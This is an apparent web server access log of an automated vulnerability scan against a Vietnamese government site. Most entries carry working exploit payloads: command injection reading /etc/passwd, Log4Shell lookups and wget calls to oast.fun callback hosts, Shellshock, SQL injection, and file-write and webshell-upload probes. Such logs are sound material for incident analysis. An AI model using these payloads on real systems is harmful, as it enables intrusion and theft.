Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 207 2023-10-24 07:54:03 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 205 2023-10-24 07:54:59 103.153.214.94 GET /manager/radius/server_ping.php ip=127.0.0.1|cat%20/etc/passwd>../../2XAKRf5W4gQIvJl78HdypLCFrWG.txt&id=1 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 208 2023-10-24 07:55:01 103.153.214.94 GET /2XAKRf5W4gQIvJl78HdypLCFrWG.txt - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 207 2023-10-24 07:56:21 103.153.214.94 POST /OAapp/bfapp/buffalo/workFlowService - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 208 2023-10-24 07:57:11 103.153.214.94 GET /api/system/deviceinfo - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 219 2023-10-24 07:57:32 103.153.214.94 POST /webmail/basic/ - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 207 2023-10-24 07:58:10 103.153.214.94 POST /sysShell - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 816 2023-10-24 07:59:46 103.153.214.94 POST /http/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 205 2023-10-24 07:59:46 103.153.214.94 POST /http/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 206 2023-10-24 08:03:21 103.153.214.94 POST /dashboard/proc.php type=login 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 205 2023-10-24 08:04:10 103.153.214.94 POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 206 2023-10-24 08:07:43 103.153.214.94 GET /data/sys-common/datajson.js s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20ckr701l02n34v9l7kpngdeu69sk65w7ns.oast.fun%22%29&type=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 212 2023-10-24 08:08:55 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 209 2023-10-24 08:13:56 103.153.214.94 POST /ajax.php action=login 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 207 2023-10-24 08:13:58 103.153.214.94 GET /index.php page=home 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 212 2023-10-24 08:16:06 103.153.214.94 POST /index.php/bbs/index/download url=/etc/passwd&name=1.txt&local=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 208 2023-10-24 08:17:27 103.153.214.94 POST /login - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 210 2023-10-24 08:17:32 103.153.214.94 POST /index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 205 2023-10-24 08:17:33 103.153.214.94 POST /lcms/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 815 2023-10-24 08:18:35 103.153.214.94 GET /api/geojson url=${jndi:ldap://${:-187}${:-972}.${hostName}.url.ckr701l02n34v9l7kpng6u14i1rdn31h7.oast.fun} 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 0 2 222 2023-10-24 08:20:46 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 212 2023-10-24 08:23:44 103.153.214.94 POST /debug.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 208 2023-10-24 08:24:14 103.153.214.94 GET /AdminPage/conf/runCmd cmd=id 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 214 2023-10-24 08:25:29 103.153.214.94 GET /upgrade_handle.php cmd=writeuploaddir&uploaddir=%27;whoami;%27 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208 2023-10-24 08:25:48 103.153.214.94 POST /opennms/j_spring_security_check - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/opennms/login.jsp 405 0 1 206 2023-10-24 08:26:40 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=9 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 216 2023-10-24 08:26:40 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=9 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205 2023-10-24 08:27:37 103.153.214.94 POST /boaform/admin/formTracert - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/diag_ping_admin_en.asp 405 0 1 207 2023-10-24 08:28:33 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 208 2023-10-24 08:28:33 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204 2023-10-24 08:30:11 103.153.214.94 GET /data/pbootcms.db - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 213 2023-10-24 08:32:38 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 211 2023-10-24 08:32:53 103.153.214.94 POST /login/userverify.cgi - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 207 2023-10-24 08:32:54 103.153.214.94 POST /cgi-bin/Maintain/date_config - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 460 2023-10-24 08:33:54 103.153.214.94 GET /api.php c=project&f=index&token=1234&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+ 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 0 2 205 2023-10-24 08:34:05 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 210 2023-10-24 08:34:13 103.153.214.94 POST /upload/UploadResourcePic.ashx ResourceID=8382 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 206 2023-10-24 08:39:57 103.153.214.94 POST /j_security_check - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn/user/login 405 0 1 209 2023-10-24 08:40:36 103.153.214.94 GET /tool/log/c.php strip_slashes=system&host=ipconfig 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 211 2023-10-24 08:42:05 103.153.214.94 GET /index.php plot=;wget%20http://ckr701l02n34v9l7kpngx5yp7wptc8dms.oast.fun 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 662 2023-10-24 08:42:40 103.153.214.94 POST /directdata/direct/router - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 209 2023-10-24 08:42:42 103.153.214.94 GET /2XAKRaqvPLucb2IsdsehCwZesmU.txt - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209 2023-10-24 08:43:59 103.153.214.94 GET /comment/api/index.php gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(999999999)))),@`%27` 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 211 2023-10-24 08:45:01 103.153.214.94 POST /seeyon/main.do method=login 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 209 2023-10-24 08:49:19 103.153.214.94 GET /cgi-bin/jarrewrite.sh - 443 - 95.111.241.172 "()+{+:;+};+echo+;+/bin/bash+-c+'cat+/etc/passwd'" - 200 0 0 210 2023-10-24 08:49:56 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn/diagnostic.html?t=201701020919 405 0 1 215 2023-10-24 08:50:40 103.153.214.94 POST /php/ping.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 212 2023-10-24 08:51:09 103.153.214.94 GET /api/ping count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 226 2023-10-24 08:52:20 103.153.214.94 GET /v1/submissions - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 208 2023-10-24 08:55:15 103.153.214.94 POST /api/login - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn/manage/account/login?redirect=%2Fmanage 404 0 2 222 2023-10-24 08:59:53 103.153.214.94 GET /dr/authentication/oauth2/oauth2login error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-607%7D$%7B%3A-249%7D.$%7BhostName%7D.uri.ckr701l02n34v9l7kpngqcadccmadbrxj.oast.fun%7D 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 212 2023-10-24 09:01:18 103.153.214.94 POST /login.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn/login.php 405 0 1 210 2023-10-24 09:01:48 103.153.214.94 GET /rest/domains/list sortCol=fullyQualifiedName&sortDir=asc 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 209 2023-10-24 09:02:59 103.153.214.94 GET /mainfile.php username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 648 2023-10-24 09:03:16 103.153.214.94 GET /api/sms_check.php param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 220 2023-10-24 09:04:39 103.153.214.94 POST /index.php m=member&f=login_save 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 210 2023-10-24 09:06:36 103.153.214.94 POST /zdm/cxf/login - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/zdm/login_xdm_uc.jsp 405 0 1 797 2023-10-24 09:09:23 103.153.214.94 GET / PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 218 2023-10-24 09:10:25 103.153.214.94 GET /admin/cms_channel.php del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(999999999)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 301 0 0 212 2023-10-24 09:10:47 103.153.214.94 GET /service/error/sfdc_preauth.jsp session=s&userid=1&server=http://ckr701l02n34v9l7kpngin9q3ab5u3yq1.oast.fun%23.salesforce.com/ 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 210 2023-10-24 09:11:24 103.153.214.94 POST /api/user/reg - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 2 817 2023-10-24 09:11:26 103.153.214.94 GET /api/group/list - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 1017 2023-10-24 09:14:21 103.153.214.94 POST /zms/admin/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn/zms/admin/index.php 405 0 1 210 2023-10-24 09:14:52 103.153.214.94 POST /admin/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 212 2023-10-24 09:15:19 103.153.214.94 POST /login.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 208 2023-10-24 09:16:09 103.153.214.94 POST /login.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 212 2023-10-24 09:16:41 103.153.214.94 GET /tool/log/c.php strip_slashes=md5&host=2XAKRdClpiyZCwgNzb2mBFAlEth 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 209 2023-10-24 09:16:42 103.153.214.94 POST /(download)/tmp/poc.txt - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 208 2023-10-24 09:18:28 103.153.214.94 POST /ddi/server/fileupload.php uploadDir=upload&name=UCK4G9.php 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 213 2023-10-24 09:20:09 103.153.214.94 POST /api/edr/sangforinter/v2/cssp/slog_client token=eyJtZDUiOnRydWV9 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 229 2023-10-24 09:27:08 103.153.214.94 POST /seeyon/main.do method=changeLocale 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 210 2023-10-24 09:28:12 103.153.214.94 GET /seeyon/thirdpartyController.do.css/..;/ajax.do - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211 2023-10-24 09:28:36 103.153.214.94 POST /scrm/crm/admin - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 210 2023-10-24 09:28:40 103.153.214.94 POST /actuator/env - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 210 2023-10-24 09:29:33 103.153.214.94 POST / g=obj_app_upfile 443 - 95.111.241.172 Mozilla/5.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Trident/4.0) - 405 0 1 215 2023-10-24 09:29:35 103.153.214.94 GET /attachements/LfYETc.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209 2023-10-24 09:31:10 103.153.214.94 POST /seeyon/wpsAssistServlet flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/GBQlSK.jsp&fileId=2 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 214 2023-10-24 09:31:11 103.153.214.94 GET /GBQlSK.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 208 2023-10-24 09:32:03 103.153.214.94 GET /index.php s=/index/index/name/$%7B@phpinfo()%7D 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 210 2023-10-24 09:33:03 103.153.214.94 GET / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 214 2023-10-24 09:34:38 103.153.214.94 GET /index.php a=fetch&content=%3C%3Fphp+file_put_contents%28%222XAKRig9b21KVkf0BJXomCzA2pu.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 211 2023-10-24 09:34:39 103.153.214.94 GET /2XAKRig9b21KVkf0BJXomCzA2pu.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 208 2023-10-24 09:39:41 103.153.214.94 POST /index.php s=captcha 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 210 2023-10-24 09:39:53 103.153.214.94 GET / s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 214 2023-10-24 09:40:06 103.153.214.94 POST / s=index/index/index 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 212 2023-10-24 09:42:59 103.153.214.94 GET /index.php ids[0,updatexml(0,concat(0xa,user()),0)]=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 210 2023-10-24 09:43:53 103.153.214.94 GET /general/appbuilder/web/portal/gateway/getdata activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBtZDUoOTk5OTk5OTk5KTs=%22)))%3B/*&id=19&module=Carouselimage 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 723 2023-10-24 09:44:40 103.153.214.94 POST /hybridity/api/sessions - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 469 2023-10-24 09:44:52 103.153.214.94 POST /ispirit/interface/gateway.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 209 2023-10-24 09:46:50 103.153.214.94 GET /2XAKRe0LCWi4rtPe2ekJWwwcTKx.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 210 2023-10-24 09:47:06 103.153.214.94 POST /ispirit/interface/gateway.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 210 2023-10-24 09:47:08 103.153.214.94 POST /mac/gateway.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 209 2023-10-24 09:48:19 103.153.214.94 GET /view/IPV6/naborTable/static_convert.php blocks[0]=||%20echo%20%272XAKQgfjKZKC48N0SwS1VDO32Bb%27%20%3E%20/var/www/html/config_application.txt%0a 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 211 2023-10-24 09:48:19 103.153.214.94 GET /config_application.txt - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 208 2023-10-24 09:49:59 103.153.214.94 POST /mobile/api/api.ali.php - 443 - 95.111.241.172 